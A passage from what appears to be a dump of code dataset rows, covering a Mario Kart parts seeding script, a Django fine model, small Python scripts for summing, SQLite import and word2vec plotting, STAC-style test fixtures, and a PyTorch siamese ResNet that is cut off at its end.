'https://images-wixmp-ed30a86b8c4ca887773594c2.wixmp.com/f/0e738c17-7f3c-422e-8225-f8c782b08626/deg7wos-27ff3182-82ba-43ab-b5c0-f05cbec329f2.png?token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJ1cm46YXBwOjdlMGQxODg5ODIyNjQzNzNhNWYwZDQxNWVhMGQyNmUwIiwiaXNzIjoidXJuOmFwcDo3ZTBkMTg4OTgyMjY0MzczYTVmMGQ0MTVlYTBkMjZlMCIsIm9iaiI6W1t7InBhdGgiOiJcL2ZcLzBlNzM4YzE3LTdmM2MtNDIyZS04MjI1LWY4Yzc4MmIwODYyNlwvZGVnN3dvcy0yN2ZmMzE4Mi04MmJhLTQzYWItYjVjMC1mMDVjYmVjMzI5ZjIucG5nIn1dXSwiYXVkIjpbInVybjpzZXJ2aWNlOmZpbGUuZG93bmxvYWQiXX0.bK3J5_NJrKn-JHsqIxEUCjBiXqM4dMnBho-b2lJ6sK8',
'https://www.smashbros.com/assets_v2/img/fighter/wario/main2.png',
'https://static.wikia.nocookie.net/wario/images/8/8a/Waluigi%28SMP%290.png/revision/latest?cb=20180929091141',
'https://static.wikia.nocookie.net/heroes-fr/images/5/5c/Donkey_Kong.png/revision/latest?cb=20201122110342&path-prefix=fr',
'https://static.wikia.nocookie.net/epicpixelbattles/images/0/0b/Bowser-png-clipart-removebg-preview.png/revision/latest?cb=20201013093525',
'https://static.wikia.nocookie.net/mario/images/1/12/MPSRSkelerex.png/revision/latest/scale-to-width-down/2000?cb=20161015183419&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/0/07/Art_Bowser_Jr_SPM.png/revision/latest?cb=20181112222531&path-prefix=fr',
'https://mario.wiki.gallery/images/thumb/9/9d/Dry_Bowser_Artwork.png/250px-Dry_Bowser_Artwork.png',
'https://www.pngkey.com/png/full/563-5634904_super-mario-odyssey-lemmy-mario-kart-8-deluxe.png',
'https://static.wikia.nocookie.net/mariokart/images/4/42/LarryKoopa.png/revision/latest?cb=20140313170129',
'https://mario.wiki.gallery/images/thumb/9/95/NSMBW_Wendy_Artwork.png/1200px-NSMBW_Wendy_Artwork.png',
'https://static.wikia.nocookie.net/mario-fr/images/f/f6/1-1571859148.png/revision/latest?cb=20191023193229&path-prefix=fr',
'https://static.wikia.nocookie.net/mario/images/4/4c/Iggy_NSMBU.png/revision/latest?cb=20171208215237&path-prefix=fr',
'https://static.wikia.nocookie.net/mario-fr/images/f/fb/2.png/revision/latest?cb=20191023191713&path-prefix=fr',
'https://static.wikia.nocookie.net/fantendo/images/4/4f/Morton_Koopa_Jr_3D.png/revision/latest?cb=20110403192112',
'https://static.wikia.nocookie.net/mario/images/2/2e/Inkling_SSBU.png/revision/latest?cb=20200216081405',
'https://i.pinimg.com/originals/7c/ce/f8/7ccef872fcee2e11945c6799ce2985cc.png',
'https://www.seekpng.com/png/full/7-73001_link-zelda-png-super-smash-bros-for-wii.png',
'https://static.wikia.nocookie.net/versus-compendium/images/0/00/Link_BotW.png/revision/latest?cb=20181128185543',
'https://static.wikia.nocookie.net/nintendo/images/1/1d/Villager-Boy-1.png/revision/latest?cb=20150419125930&path-prefix=en',
'https://i.pinimg.com/originals/bb/ca/f7/bbcaf749d9dc2d1b1259e8fe5cb49769.png',
'https://static.wikia.nocookie.net/nintendo-univers/images/a/a9/Marie_ACAF_3.png/revision/latest?cb=20161221163100&path-prefix=fr',
]
car_names = [
'Standard Kart',
'Pipe Frame',
'Mach 8',
'Steel Driver',
'Cat Cruiser',
'Circuit Special',
'Tri-Speeder',
'Badwagon',
'Prancer',
'Biddybuggy',
'Landship',
'Sneeker',
'Sports Coupe',
'Gold Standard',
'GLA',
'W 25 Silver Arrow',
'300 SL Roadster',
'Blue Falcon',
'Tanooki Kart',
'B Dasher',
'Streetle',
'P-Wing',
'Koopa Clown',
'Standard Bike',
'Comet',
'Sport Bike',
'The Duke',
'Flame Rider',
'Varmint',
'Mr. Scooty',
'Jet Bike',
'Yoshi Bike',
'Master Cycle',
'Master Cycle Zero',
'City Tripper',
'Standard ATV',
'Wild Wiggler',
'Teddy Buggy',
'Bone Rattler',
'Splat Buggy',
'Inkstriker',
]
car_urls = [
'https://static.wikia.nocookie.net/mariokart/images/0/05/StandardKartBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20140715154926',
'https://static.wikia.nocookie.net/mariokart/images/d/d1/PipeFrameBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102122932',
'https://static.wikia.nocookie.net/mariokart/images/d/df/Mach8BodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102122956',
'https://static.wikia.nocookie.net/mariokart/images/9/94/Steel_Driver.png/revision/latest/scale-to-width-down/100?cb=20200925190921',
'https://static.wikia.nocookie.net/mariokart/images/f/f4/CatCruiserBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123132',
'https://static.wikia.nocookie.net/mariokart/images/6/6c/CircuitSpecialBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123237',
'https://static.wikia.nocookie.net/mariokart/images/5/56/TrispeederBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123217',
'https://static.wikia.nocookie.net/mariokart/images/c/c2/BadwagonBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123350',
'https://static.wikia.nocookie.net/mariokart/images/f/ff/PrancerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123333',
'https://static.wikia.nocookie.net/mariokart/images/4/45/BiddybuggyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123322',
'https://static.wikia.nocookie.net/mariokart/images/6/6d/LandshipBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123656',
'https://static.wikia.nocookie.net/mariokart/images/4/47/SneakerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123617',
'https://static.wikia.nocookie.net/mariokart/images/f/f8/SportsCoupeMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123625',
'https://static.wikia.nocookie.net/mariokart/images/3/31/MK8Gold_Standard.png/revision/latest/scale-to-width-down/100?cb=20141102123637',
'https://static.wikia.nocookie.net/mariokart/images/c/c2/GLA-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140333',
'https://static.wikia.nocookie.net/mariokart/images/2/25/W25SilverArrow-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140332',
'https://static.wikia.nocookie.net/mariokart/images/1/17/300SLRoadster-MK8.png/revision/latest/scale-to-width-down/100?cb=20160102140332',
'https://static.wikia.nocookie.net/mariokart/images/e/ed/MK8_BlueFalcon.png/revision/latest/scale-to-width-down/100?cb=20150331235059',
'https://static.wikia.nocookie.net/mariokart/images/d/d7/MK8_TanookiBuggy.png/revision/latest/scale-to-width-down/100?cb=20150331235545',
'https://static.wikia.nocookie.net/mariokart/images/3/32/MK8_BDasher.png/revision/latest/scale-to-width-down/100?cb=20150401000836',
'https://static.wikia.nocookie.net/mariokart/images/c/cf/MK8Streetle.png/revision/latest/scale-to-width-down/100?cb=20150426174005',
'https://static.wikia.nocookie.net/mariokart/images/c/cd/MK8PWing.png/revision/latest/scale-to-width-down/100?cb=20150426174107',
'https://static.wikia.nocookie.net/mariokart/images/7/70/MK8DX_Koopa_Clown.png/revision/latest/scale-to-width-down/100?cb=20170704061052',
'https://static.wikia.nocookie.net/mariokart/images/8/84/StandardBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123849',
'https://static.wikia.nocookie.net/mariokart/images/0/0e/CometBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124024',
'https://static.wikia.nocookie.net/mariokart/images/f/fe/SportBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123857',
'https://static.wikia.nocookie.net/mariokart/images/8/8a/TheDukeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925174819',
'https://static.wikia.nocookie.net/mariokart/images/3/31/FlameRiderBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123942',
'https://static.wikia.nocookie.net/mariokart/images/d/d0/VarmintBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123951',
'https://static.wikia.nocookie.net/mariokart/images/1/18/MrScootyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123925',
'https://static.wikia.nocookie.net/mariokart/images/1/12/JetBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102123928',
'https://static.wikia.nocookie.net/mariokart/images/6/62/YoshiBikeBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925193256',
'https://static.wikia.nocookie.net/mariokart/images/5/52/MK8_MasterCycle.png/revision/latest/scale-to-width-down/100?cb=20150331231734',
'https://static.wikia.nocookie.net/mariokart/images/3/3e/150px-MK8D_Master_Cycle_Zero.png/revision/latest/scale-to-width-down/111?cb=20200726154936',
'https://static.wikia.nocookie.net/mariokart/images/9/90/MK8CityTripper.png/revision/latest/scale-to-width-down/100?cb=20150426175601',
'https://static.wikia.nocookie.net/mariokart/images/2/23/StandardATVBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124111',
'https://static.wikia.nocookie.net/mariokart/images/a/aa/WildWigglerBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20200925175122',
'https://static.wikia.nocookie.net/mariokart/images/f/fa/TeddyBuggyBodyMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124120',
'https://static.wikia.nocookie.net/mariokart/images/0/0a/MK8BoneRattler.png/revision/latest/scale-to-width-down/100?cb=20150426180108',
'https://static.wikia.nocookie.net/mariokart/images/6/63/MK8DX_Splat_Buggy.png/revision/latest/scale-to-width-down/100?cb=20170706064814',
'https://static.wikia.nocookie.net/mariokart/images/e/eb/MK8DX_Inkstriker.png/revision/latest/scale-to-width-down/100?cb=20170706065507',
]
# Mario Kart 8 (Deluxe) part data: names and wiki image URLs, index-aligned
# (tire_names[i] corresponds to tire_urls[i], and likewise for gliders).
tire_names = [
    'Standard',
    'Monster',
    'Roller',
    'Slim',
    'Slick',
    'Metal',
    'Button',
    'Off-Road',
    'Sponge',
    'Wood',
    'Cushion',
    'Blue Standard',
    'Hot Monster',
    'Azure Roller',
    'Crimson Slim',
    'Cyber Slick',
    'Retro Off-Road',
    'Gold Tires',
    'GLA Tires',
    'Triforce Tires',
    'Ancient Tyres',
    'Leaf Tires',
]
tire_urls = [
    'https://static.wikia.nocookie.net/mariokart/images/a/a8/StandardTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125545',
    'https://static.wikia.nocookie.net/mariokart/images/2/29/MonsterTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125541',
    'https://static.wikia.nocookie.net/mariokart/images/7/76/RollerTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125539',
    'https://static.wikia.nocookie.net/mariokart/images/f/f8/SlimTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125536',
    'https://static.wikia.nocookie.net/mariokart/images/d/dd/SlickTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125542',
    'https://static.wikia.nocookie.net/mariokart/images/9/96/MetalTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124533',
    'https://static.wikia.nocookie.net/mariokart/images/0/07/ButtonTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124541',
    'https://static.wikia.nocookie.net/mariokart/images/2/25/Off-Road.png/revision/latest/scale-to-width-down/100?cb=20141102124559',
    'https://static.wikia.nocookie.net/mariokart/images/4/4c/SpongeTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124549',
    'https://static.wikia.nocookie.net/mariokart/images/0/03/WoodTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124724',
    'https://static.wikia.nocookie.net/mariokart/images/9/92/CushionTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124817',
    'https://static.wikia.nocookie.net/mariokart/images/d/db/Blue_Standard.png/revision/latest/scale-to-width-down/100?cb=20141102124836',
    'https://static.wikia.nocookie.net/mariokart/images/d/d1/HotMonsterTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102124834',
    'https://static.wikia.nocookie.net/mariokart/images/f/fe/AzureRollerTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20200726154338',
    'https://static.wikia.nocookie.net/mariokart/images/7/71/CrimsonSlimTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125627',
    'https://static.wikia.nocookie.net/mariokart/images/2/29/CyberSlickTiresMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125626',
    'https://static.wikia.nocookie.net/mariokart/images/4/48/Retro_Off-Road.png/revision/latest/scale-to-width-down/100?cb=20141102125629',
    'https://static.wikia.nocookie.net/mariokart/images/5/52/Gold_Tires_MK8.png/revision/latest/scale-to-width-down/100?cb=20141102125630',
    'https://static.wikia.nocookie.net/mariokart/images/b/ba/GLATires-MK8.png/revision/latest/scale-to-width-down/100?cb=20150426180539',
    'https://static.wikia.nocookie.net/mariokart/images/0/09/MK8_TriforceTires.png/revision/latest/scale-to-width-down/100?cb=20150331233357',
    'https://static.wikia.nocookie.net/mariokart/images/d/d5/MK8D_Ancient_Tires.png/revision/latest/scale-to-width-down/100?cb=20200726154442',
    'https://static.wikia.nocookie.net/mariokart/images/f/f9/Leaf_Tires_MK8.png/revision/latest/scale-to-width-down/100?cb=20150426180810',
]
glider_names = [
    'Super Glider',
    'Cloud Glider',
    'Wario Wing',
    'Waddle Wing',
    'Peach Parasol',
    'Parachute',
    'Parafoil',
    'Flower Glider',
    'Bowser Kite',
    'Plane Glider',
    'MKTV Parafoil',
    'Gold Glider',
    'Hylian Kite',
    'Paraglider',
    'Paper Glider',
]
glider_urls = [
    'https://static.wikia.nocookie.net/mariokart/images/a/a8/SuperGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125815',
    'https://static.wikia.nocookie.net/mariokart/images/8/84/Cloud_Glider.png/revision/latest/scale-to-width-down/100?cb=20141102125838',
    'https://static.wikia.nocookie.net/mariokart/images/a/ae/WarioWingMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125853',
    'https://static.wikia.nocookie.net/mariokart/images/e/ef/WaddleWingMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125901',
    'https://static.wikia.nocookie.net/mariokart/images/6/6e/PeachParasolGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125940',
    'https://static.wikia.nocookie.net/mariokart/images/d/dd/ParachuteGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125823',
    'https://static.wikia.nocookie.net/mariokart/images/c/c4/ParafoilGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125830',
    'https://static.wikia.nocookie.net/mariokart/images/b/b3/FlowerGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125846',
    'https://static.wikia.nocookie.net/mariokart/images/f/f7/BowserKiteMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125909',
    'https://static.wikia.nocookie.net/mariokart/images/c/ca/PlaneGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125930',
    'https://static.wikia.nocookie.net/mariokart/images/9/96/MKTVParafoilGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125947',
    'https://static.wikia.nocookie.net/mariokart/images/1/18/GoldGliderMK8.png/revision/latest/scale-to-width-down/100?cb=20141102125956',
    'https://static.wikia.nocookie.net/mariokart/images/6/62/MK8_HylianKite.png/revision/latest/scale-to-width-down/100?cb=20150331232731',
    'https://static.wikia.nocookie.net/mariokart/images/3/39/MK8D_Paraglider.png/revision/latest/scale-to-width-down/117?cb=20200726155246',
    'https://static.wikia.nocookie.net/mariokart/images/0/0e/PaperGliderIcon-MK8.png/revision/latest/scale-to-width-down/100?cb=20150426181313',
]
# Seed the database: pair each name with its image URL and assign a 1-based
# display index.  Palette-swap characters (alternate Yoshi / Shy Guy colours
# and "(G)" gold variants) are stored with index=None and do not advance the
# numbering of the regular roster.
skipped = 0
for pos, (name, url) in enumerate(zip(char_names, char_urls)):
    if "Yoshi (" in name or "Shyguy (" in name or "(G)" in name:
        skipped += 1
        index = None
    else:
        index = pos - skipped + 1
    Character(name=name, image_url=url, index=index).save()

# Tires, vehicles and gliders are numbered sequentially with no exceptions.
for pos, (name, url) in enumerate(zip(tire_names, tire_urls)):
    Tire(name=name, image_url=url, index=pos + 1).save()

for pos, (name, url) in enumerate(zip(car_names, car_urls)):
    Vehicle(name=name, image_url=url, index=pos + 1).save()

for pos, (name, url) in enumerate(zip(glider_names, glider_urls)):
    Glider(name=name, image_url=url, index=pos + 1).save()
|
7,109 | 22b697790516e1160ac501a58ad93ef5b579414a | from django.contrib.auth.decorators import permission_required
from django.db import models
from students.models import Student
# Create your models here.
class Fine(models.Model):
    """Monetary fine owed by a single student (one row per student)."""
    # Up to 8 digits with 2 decimal places; nullable, defaults to 0.
    amount = models.DecimalField(max_digits=8, decimal_places=2, null=True, default=0)
    # Exactly one fine record per student; deleting the student leaves the
    # row in place (DO_NOTHING — the database is not told to cascade).
    student = models.OneToOneField(Student, on_delete=models.DO_NOTHING)
    timestamp = models.DateField(auto_now_add=True)  # set once at creation
    updated_at = models.DateField(auto_now=True)  # refreshed on every save
    class Meta:
        db_table = 'fines'
        verbose_name_plural = 'Fines'
        verbose_name = 'Fine'
    def __str__(self):
        # Display the amount in the admin / shell.
        return str(self.amount)
|
7,110 | 88e34ee5cd5af7d3b04321c4aa4fc815f926add1 | # A program to display and find the sum of a list of numbers using for loop
# Display each number in a list and print their running total.
# (Renamed from `list`/`sum`, which shadowed the builtins of the same name.)
numbers = [10, 20, 30, 40, 50]
total = 0
for value in numbers:
    print(value)
    total = total + value
print('sum =', total)
7,111 | 497203be99643e2bb0087977f292f4ed890f9ead | import requests
import sqlite3
# Fetch the employee list from the demo REST API and mirror it into a local
# SQLite database.
url = 'http://dummy.restapiexample.com/api/v1/employees'
r = requests.get(url)
packages_json = r.json()

# Create the employee database (file) if it does not exist.
db = sqlite3.connect('employee.sqlite')

# Create the table.  Fixed: the original statement said "PRIMAR KEY", which
# SQLite rejects as a syntax error, so the table was never created.
db.execute(
    "CREATE TABLE IF NOT EXISTS employee "
    "(id INTEGER PRIMARY KEY, employee_name TEXT, employee_salary INTEGER, "
    "employee_age INTEGER, profile_image BLOB)"
)

# Insert every employee record returned by the API, then persist; the
# try/finally guarantees the connection is closed even if an insert fails.
try:
    for employee in packages_json['data']:
        db.execute(
            "INSERT INTO employee VALUES (?, ?, ?, ?, ?)",
            [employee["id"], employee["employee_name"], employee["employee_salary"],
             employee["employee_age"], employee["profile_image"]],
        )
    db.commit()
finally:
    db.close()
|
7,112 | 31996699bec6507d941eb8a7aaacffbd6248d79c | # coding: utf-8
import re
import numpy as np
from sklearn.manifold import TSNE
import word2vec
from matplotlib import pyplot as plt
from adjustText import adjust_text
import nltk
'''
word2vec.word2phrase('all.txt', 'phrases.txt', verbose=True)
word2vec.word2vec('phrases.txt', 'text.bin', size=100, verbose=True)
word2vec.word2clusters('all.txt', 'clusters.txt', 100, verbose=True)
'''
# Load the pre-trained word2vec model and embed the 500 most frequent tokens
# into 2-D with t-SNE for visualisation.
model = word2vec.load('text.bin')
words = [word for word in model.vocab[:500]]
X = [ model[word] for word in words]
X = np.array(X)
tsne = TSNE(n_components=2)
X_tsne = tsne.fit_transform(X)
def plot_scatter(x, y, texts, adjust=False):
    """Scatter-plot the points and label each with its word.

    When *adjust* is true, adjustText untangles overlapping labels and the
    iteration count is shown in the title.  The figure is always saved to
    the hard-coded file name "500".
    """
    fig, ax = plt.subplots()
    ax.plot(x, y, 'bo')
    # Rebinds the *texts* parameter to the created matplotlib Text artists.
    texts = [plt.text(x[i], y[i], texts[i]) for i in range(len(x))]
    if adjust:
        plt.title(str( adjust_text(texts, x, y, arrowprops=dict(arrowstyle='->', color='red')))+' iterations')
    plt.savefig("500")
# Keep only punctuation-free words whose POS tag is an adjective or a noun
# (JJ / NNP / NN / NNS) and collect their 2-D t-SNE coordinates.
# NOTE(review): the character class below contains mojibake characters,
# presumably curly quotes in the original encoding — kept verbatim.
pattern = re.compile(r"[,.:;!?โโโ]")
X, Y, texts = [], [], []
for i, word in enumerate(words):
    if not pattern.findall(word):
        tag = nltk.pos_tag([word])
        # Skip anything that is not an adjective or noun form.
        if tag[0][1] != 'JJ' and tag[0][1] != 'NNP' and tag[0][1] != 'NN' and tag[0][1] != 'NNS':
            continue
        X.append(X_tsne[i][0])
        Y.append(X_tsne[i][1])
        texts.append(word)
print(len(X))
plot_scatter(X, Y, texts, True)
|
7,113 | 7801676df91a7ded6f123113acc62f3955dfe6cb | providers = {
'provider-1': {
'name': 'provider-1',
'roles': ['licensor', 'producer'],
'description': 'This is a full description of the provider',
'url': 'https://www.provider.com'
},
'provider-2': {
'name': 'provider-2',
'roles': ['licensor'],
'description': 'This is a full description of a second provider',
'url': 'https://www.provider.com/provider-2'
},
'provider-3': {
'name': 'provider-3',
}
}
providers_invalid = {
'provider-invalid': {
'name': 'provider invalid ', 'roles': ['Test'], 'url': 'This is not an url'
},
}
links = {
'link-1': {
'rel': 'describedBy',
'href': 'https://www.example.com/described-by',
'title': 'This is an extra link',
'link_type': 'description'
}
}
links_invalid = {
'link-invalid': {
'rel': 'invalid relation',
'href': 'not a url',
}
}
collections = {
'collection-1': {
'name': 'collection-1',
'description': 'This a collection description',
'title': 'My collection 1',
'license': 'proprietary',
'providers': providers.values(),
'links': links.values()
},
'collection-2': {
'name': 'collection-2',
'description': 'This a second open source collection description',
'title': 'My collection 2',
'license': 'MIT',
'providers': [providers['provider-2']]
},
'collection-3': {
'name': 'collection-3',
'description': 'This a third open source collection description',
'title': 'My collection 3',
'license': 'MIT',
'links': [links['link-1']]
},
'collection-4': {
'name': 'collection-3',
'description': 'This a fourth open source collection description',
'title': 'My collection 4',
'license': 'MIT'
},
'collection-invalid': {
'name': 'collection invalid name',
'description': 45,
'title': 34,
'license': ['proprietary'],
},
'collection-missing-mandatory-fields': {
'name': 'collection-missing-mandatory-fields'
},
'collection-invalid-links': {
'name': 'collection-invalid-link',
'description': 'This is a collection with invalid user link',
'license': 'proprietary',
'links': [links_invalid['link-invalid']]
},
'collection-invalid-providers': {
'name': 'collection-invalid-provider',
'description': 'This is a collection with invalid provider',
'license': 'proprietary',
'providers': providers_invalid.values()
},
}
|
7,114 | d3f42f329246164cdb6113df3da0eb2d3203b2a9 | import torch
import torch.nn as nn
import torch.nn.functional as F
class BasicBlock(nn.Module):
    """Two 3x3-conv residual block (ResNet-18/34 style)."""

    expansion = 1

    def __init__(self, in_planes, planes, stride=1):
        super(BasicBlock, self).__init__()
        # Main path: conv-bn -> conv-bn; the first conv carries the stride.
        self.conv1 = nn.Conv2d(in_planes, planes,
                               kernel_size=3, stride=stride,
                               padding=1, bias=False)
        self.bn1 = nn.BatchNorm2d(planes)
        self.conv2 = nn.Conv2d(planes, planes,
                               kernel_size=3, stride=1,
                               padding=1, bias=False)
        self.bn2 = nn.BatchNorm2d(planes)
        # Identity shortcut unless the shape changes; then project with a
        # strided 1x1 conv + batch norm.
        self.shortcut = nn.Sequential()
        if stride != 1 or in_planes != self.expansion * planes:
            self.shortcut = nn.Sequential(
                nn.Conv2d(in_planes, self.expansion * planes,
                          kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(self.expansion * planes)
            )

    def forward(self, x):
        """Residual forward: relu(bn(conv(relu(bn(conv(x))))) + shortcut(x))."""
        identity = self.shortcut(x)
        out = F.relu(self.bn1(self.conv1(x)))
        out = self.bn2(self.conv2(out))
        out = out + identity
        return F.relu(out)
class Bottleneck(nn.Module):
    """1x1 -> 3x3 -> 1x1 bottleneck residual block (ResNet-50+ style)."""

    expansion = 4

    def __init__(self, in_planes, planes, stride=1):
        super(Bottleneck, self).__init__()
        # Reduce channels, transform (the 3x3 carries the stride), then
        # expand back out by `expansion`.
        self.conv1 = nn.Conv2d(in_planes, planes, kernel_size=1, bias=False)
        self.bn1 = nn.BatchNorm2d(planes)
        self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride, padding=1, bias=False)
        self.bn2 = nn.BatchNorm2d(planes)
        self.conv3 = nn.Conv2d(planes, self.expansion * planes, kernel_size=1, bias=False)
        self.bn3 = nn.BatchNorm2d(self.expansion * planes)
        # Project the identity path whenever spatial size or channel count
        # would otherwise disagree with the main path.
        self.shortcut = nn.Sequential()
        if stride != 1 or in_planes != self.expansion * planes:
            self.shortcut = nn.Sequential(
                nn.Conv2d(in_planes, self.expansion * planes,
                          kernel_size=1, stride=stride, bias=False),
                nn.BatchNorm2d(self.expansion * planes)
            )

    def forward(self, x):
        """Residual forward through the three conv stages plus shortcut."""
        out = F.relu(self.bn1(self.conv1(x)))
        out = F.relu(self.bn2(self.conv2(out)))
        out = self.bn3(self.conv3(out))
        out = out + self.shortcut(x)
        return F.relu(out)
class ResNet(nn.Module):
    """Siamese ResNet: embeds two images with a shared backbone and scores
    their absolute feature difference.

    ``forward(x0, x1)`` passes both inputs through the same backbone + fc1 +
    sigmoid, then maps ``|x0 - x1|`` through ``fc2`` to one scalar per pair.
    """
    def __init__(self, in_plane, block, num_blocks, hidden_dim=512, out_dim=1):
        super(ResNet, self).__init__()
        self.in_planes = 64  # running channel count consumed by _make_layer
        # Stem: 3x3 conv keeps the spatial size (stride 1, padding 1).
        self.conv1 = nn.Conv2d(in_plane, 64, kernel_size=3,
                               stride=1, padding=1, bias=False)
        self.bn1 = nn.BatchNorm2d(64)
        # Four stages; stages 2-4 halve the spatial resolution.
        self.layer1 = self._make_layer(block, 64, num_blocks[0], stride=1)
        self.layer2 = self._make_layer(block, 128, num_blocks[1], stride=2)
        self.layer3 = self._make_layer(block, 256, num_blocks[2], stride=2)
        self.layer4 = self._make_layer(block, 512, num_blocks[3], stride=2)
        # Projection head applied to the flattened backbone features.
        self.fc1 = nn.Sequential(
            nn.Linear(512 * block.expansion, hidden_dim),
            nn.BatchNorm1d(hidden_dim),
            nn.ReLU(inplace=True)
        )
        self.fc2 = nn.Linear(hidden_dim, out_dim)  # pair-difference scorer
        self.img_output_dim = None  # set lazily on the first forward pass
        self.drop_path_prob = 0.0
        # He initialisation for convs; BN scales start at 1, shifts at 0.
        for m in self.modules():
            if isinstance(m, nn.Conv2d):
                nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
            elif isinstance(m, nn.BatchNorm2d):
                nn.init.constant_(m.weight, 1)
                nn.init.constant_(m.bias, 0)
        # Zero-init the last BN of every residual block so each block starts
        # as an identity mapping.
        for m in self.modules():
            if isinstance(m, Bottleneck):
                nn.init.constant_(m.bn3.weight, 0)
            elif isinstance(m, BasicBlock):
                nn.init.constant_(m.bn2.weight, 0)
    def _make_layer(self, block, planes, num_blocks, stride):
        """Stack `num_blocks` blocks; only the first carries the stride."""
        strides = [stride] + [1] * (num_blocks - 1)
        layers = []
        for stride in strides:
            layers.append(block(self.in_planes, planes, stride))
            self.in_planes = planes * block.expansion
        return nn.Sequential(*layers)
    def extract_feature(self, x):
        """Backbone features: stem -> 4 stages -> 4x4 avg pool -> flatten."""
        out = F.relu(self.bn1(self.conv1(x)))
        out = self.layer1(out)
        out = self.layer2(out)
        out = self.layer3(out)
        out = self.layer4(out)
        # NOTE(review): a fixed 4x4 average pool assumes the final feature
        # map is 4x4 (i.e. 32x32 inputs).  For larger inputs the flattened
        # size will not match fc1's expected 512*expansion — confirm.
        out = F.avg_pool2d(out, 4)
        out = out.view(out.size(0), -1)
        return out
    def sub_forward(self, x):
        """One branch of the siamese network: features -> fc1 -> sigmoid."""
        x = self.extract_feature(x)
        x = self.fc1(x)
        x = torch.sigmoid(x)
        return x
    def forward(self, x0, x1):
        """Score a pair: fc2 applied to |embed(x0) - embed(x1)|."""
        x0 = self.sub_forward(x0)
        if self.img_output_dim is None:
            self.img_output_dim = x0.shape[1]
        x1 = self.sub_forward(x1)
        diff = torch.abs(x0 - x1)
        scores = self.fc2(diff)
        scores = torch.reshape(scores, (-1,))  # flatten to (batch,)
        return scores
class MLP_classifier(nn.Module):
    """Three-layer MLP head trained on detached (frozen) input features."""

    def __init__(self, in_dim, hidden_dim=512, out_dim=10):
        super(MLP_classifier, self).__init__()
        self.fc1 = nn.Sequential(
            nn.Linear(in_dim, hidden_dim),
            nn.BatchNorm1d(hidden_dim),
            nn.ReLU(inplace=True)
        )
        self.fc2 = nn.Sequential(
            nn.Linear(hidden_dim, hidden_dim),
            nn.BatchNorm1d(hidden_dim),
            nn.ReLU(inplace=True)
        )
        self.fc3 = nn.Linear(hidden_dim, out_dim)

    def forward(self, x):
        # Detach so no gradient flows back into the feature extractor.
        features = x.detach()
        hidden = self.fc2(self.fc1(features))
        return self.fc3(hidden)
def ResNet18(in_plane):
    """ResNet-18: BasicBlock with [2, 2, 2, 2] blocks per stage.

    Fixed to accept and forward ``in_plane`` like the other factory
    functions: the original called ``ResNet(BasicBlock, [2, 2, 2, 2])``,
    which binds ``BasicBlock`` to the ``in_plane`` parameter and raises a
    TypeError for the missing ``num_blocks`` argument.
    """
    return ResNet(in_plane, BasicBlock, [2, 2, 2, 2])
def ResNet34(in_plane):
    """ResNet-34: BasicBlock with [3, 4, 6, 3] blocks per stage."""
    return ResNet(in_plane, BasicBlock, [3, 4, 6, 3])
def ResNet50(in_plane):
    """ResNet-50: Bottleneck with [3, 4, 6, 3] blocks per stage."""
    return ResNet(in_plane, Bottleneck, [3, 4, 6, 3])
def ResNet101(in_plane):
    """ResNet-101: Bottleneck with [3, 4, 23, 3] blocks per stage."""
    return ResNet(in_plane, Bottleneck, [3, 4, 23, 3])
def ResNet152(in_plane):
    """ResNet-152: Bottleneck with [3, 8, 36, 3] blocks per stage."""
